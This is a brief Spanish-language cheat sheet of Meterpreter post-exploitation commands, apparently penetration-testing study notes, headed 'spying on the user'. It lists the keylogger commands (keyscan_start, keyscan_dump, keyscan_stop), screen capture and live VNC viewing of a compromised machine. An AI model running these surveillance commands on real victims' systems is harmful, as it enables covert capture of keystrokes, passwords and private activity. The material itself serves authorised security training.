# Meterpreter 2 

Espionaje al usuario 

## Generar un Keylogger 

Hay que cambiar de super usuario a un usuario normal 

### Iniciar Keylogger

```bash 
keyscan_start 
```

Es para empezar el keylogger 

### Ver buffer / Lo que se presiono

```bash 
keyscan_dump
```

### Detener Keylogger

```bash 
keyscan_stop
```

## Screenshot 

```bash 
screenshot
```
Guarda una imagen de donde esta del sistema 

## Ver en tiempo real 

```bash 
run vnc 
``` 
